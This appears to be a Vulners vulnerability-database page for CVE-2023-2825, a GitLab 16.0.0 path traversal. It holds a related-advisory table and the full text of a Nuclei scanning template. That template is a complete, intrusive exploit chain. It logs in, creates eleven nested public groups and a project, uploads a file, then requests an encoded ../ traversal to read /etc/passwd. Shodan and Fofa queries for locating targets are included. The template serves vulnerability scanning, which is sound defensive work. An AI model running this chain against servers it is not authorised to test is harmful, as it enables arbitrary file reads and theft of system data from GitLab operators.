| Reporter | Title | Published | Views | Family All 28 |
|---|---|---|---|---|
| Exploit for Path Traversal in Gitlab | 20 Jun 202420:22 | – | githubexploit | |
| Exploit for Path Traversal in Gitlab | 30 May 202307:03 | – | githubexploit | |
| Exploit for Path Traversal in Gitlab | 25 May 202313:25 | – | githubexploit | |
| CVE-2023-2825 | 26 May 202321:15 | – | attackerkb | |
| The vulnerability of the Git-based software platform for collaborative code development on GitLab arises from an incorrect limitation on the path name for the restricted access directory. This allows a malicious actor to gain unauthorized access to protected information. | 25 May 202300:00 | – | bdu_fstec | |
| CVE-2023-2825 | 24 May 202319:32 | – | circl | |
| GitLab 路径遍历漏洞 | 24 May 202300:00 | – | cnnvd | |
| GitLab CE/EE Path Traversal Vulnerability | 26 May 202300:00 | – | cnvd | |
| Directory Traversal Vulnerability in GitLab CE/EE | 29 May 202300:00 | – | cnvd | |
| CVE-2023-2825 | 26 May 202300:00 | – | cve |
id: CVE-2023-2825
info:
name: GitLab 16.0.0 - Path Traversal
author: DhiyaneshDk,rootxharsh,iamnoooob,pdresearch
severity: high
description: |
An issue has been discovered in GitLab CE/EE affecting only version 16.0.0. An unauthenticated malicious user can use a path traversal vulnerability to read arbitrary files on the server when an attachment exists in a public project nested within at least five groups
impact: |
Authenticated attackers can exploit path traversal vulnerabilities to read arbitrary files from GitLab 16.0.0 servers when attachments exist in public projects nested within at least five groups.
remediation: |
Upgrade GitLab to a version that is not affected by the path traversal vulnerability (CVE-2023-2825).
reference:
- https://about.gitlab.com/releases/2023/05/23/critical-security-release-gitlab-16-0-1-released/
- https://github.com/Occamsec/CVE-2023-2825
- https://labs.watchtowr.com/gitlab-arbitrary-file-read-gitlab-cve-2023-2825-analysis/
- https://nvd.nist.gov/vuln/detail/CVE-2023-2825
- https://gitlab.com/gitlab-org/cves/-/blob/master/2023/CVE-2023-2825.json
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-2825
cwe-id: CWE-22
epss-score: 0.71641
epss-percentile: 0.99341
cpe: cpe:2.3:a:gitlab:gitlab:16.0.0:*:*:*:community:*:*:*
metadata:
verified: true
max-request: 16
vendor: gitlab
product: gitlab
shodan-query:
- title:"Gitlab"
- cpe:"cpe:2.3:a:gitlab:gitlab"
- http.title:"gitlab"
fofa-query: title="gitlab"
google-query: intitle:"gitlab"
tags: cve2023,cve,gitlab,lfi,authenticated,intrusive,vuln
variables:
data: "{{rand_base(5)}}"
http:
- raw:
- |
GET /users/sign_in HTTP/1.1
Host: {{Hostname}}
- |
POST /users/sign_in HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Accept: */*
user%5Blogin%5D={{username}}&user%5Bpassword%5D={{password}}&authenticity_token={{token_1}}
- |
POST /groups HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Accept: */*
group%5Bparent_id%5D=&group%5Bname%5D={{data}}-1&group%5Bpath%5D={{data}}-1&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
- |
POST /groups HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-2&group%5Bpath%5D={{data}}-2&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
- |
POST /groups HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-3&group%5Bpath%5D={{data}}-3&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
- |
POST /groups HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-4&group%5Bpath%5D={{data}}-4&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
- |
POST /groups HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-5&group%5Bpath%5D={{data}}-5&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
- |
POST /groups HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-6&group%5Bpath%5D={{data}}-6&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
- |
POST /groups HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-7&group%5Bpath%5D={{data}}-7&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
- |
POST /groups HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-8&group%5Bpath%5D={{data}}-8&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
- |
POST /groups HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-9&group%5Bpath%5D={{data}}-9&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
- |
POST /groups HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-10&group%5Bpath%5D={{data}}-10&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
- |
POST /groups HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
group%5Bparent_id%5D={{parent_id}}&group%5Bname%5D={{data}}-11&group%5Bpath%5D={{data}}-11&group%5Bvisibility_level%5D=20&authenticity_token={{token_2}}
- |
@timeout: 15s
POST /projects HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
project%5Bci_cd_only%5D=false&project%5Bname%5D=CVE-2023-2825&project%5Bselected_namespace_id%5D={{namespace_id}}&project%5Bnamespace_id%5D={{namespace_id}}&project%5Bpath%5D=CVE-2023-2825&project%5Bvisibility_level%5D=20&project%5Binitialize_with_readme=1&authenticity_token={{token_2}}
- |
POST /{{data}}-1/{{data}}-2/{{data}}-3/{{data}}-4/{{data}}-5/{{data}}-6/{{data}}-7/{{data}}-8/{{data}}-9/{{data}}-10/{{data}}-11/CVE-2023-2825/uploads HTTP/1.1
Host: {{Hostname}}
Accept: */*
X-CSRF-Token: {{x-csrf-token}}
Content-Type: multipart/form-data; boundary=0ce2a9fbe06b6da89c138a35a1765ed6
--0ce2a9fbe06b6da89c138a35a1765ed6
Content-Disposition: form-data; name="file"; filename="{{randstr}}"
{{randstr}}
--0ce2a9fbe06b6da89c138a35a1765ed6--
- |
GET /{{data}}-1/{{data}}-2/{{data}}-3/{{data}}-4/{{data}}-5/{{data}}-6/{{data}}-7/{{data}}-8/{{data}}-9/{{data}}-10/{{data}}-11/CVE-2023-2825/uploads/{{upload-hash}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: {{Hostname}}
Accept: */*
host-redirects: true
matchers-condition: and
matchers:
- type: word
words:
- 726f6f743a78
encoding: hex
- type: word
part: header
words:
- application/octet-stream
- etc%2Fpasswd
condition: and
extractors:
- type: regex
name: token_1
group: 1
regex:
- name="authenticity_token" value="([A-Za-z0-9_-]+)"
internal: true
part: body
- type: regex
name: token_2
group: 1
regex:
- name="csrf\-token" content="([A-Z_0-9a-z-]+)"
internal: true
part: body
- type: regex
name: parent_id
group: 1
regex:
- href="\/groups\/new\?parent_id=([0-9]+)
internal: true
part: body
- type: regex
name: namespace_id
group: 1
regex:
- ref="\/projects\/new\?namespace_id=([0-9]+)
internal: true
part: body
- type: regex
name: x-csrf-token
group: 1
regex:
- const headers = \{"X\-CSRF\-Token":"([a-zA-Z-0-9_]+)"
internal: true
part: body
- type: regex
name: upload-hash
group: 1
regex:
- '"url":"\/uploads\/([0-9a-z]+)\/'
internal: true
part: body
# digest: 4a0a0047304502200fafff50b065860e29e36641b9c3d98f6fcc7f3562548c2c6cf8b3348c9f227202210097fffa68731e96a1fbb45db3cbe341c790918d63f75f55b6fbb621160d716743:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation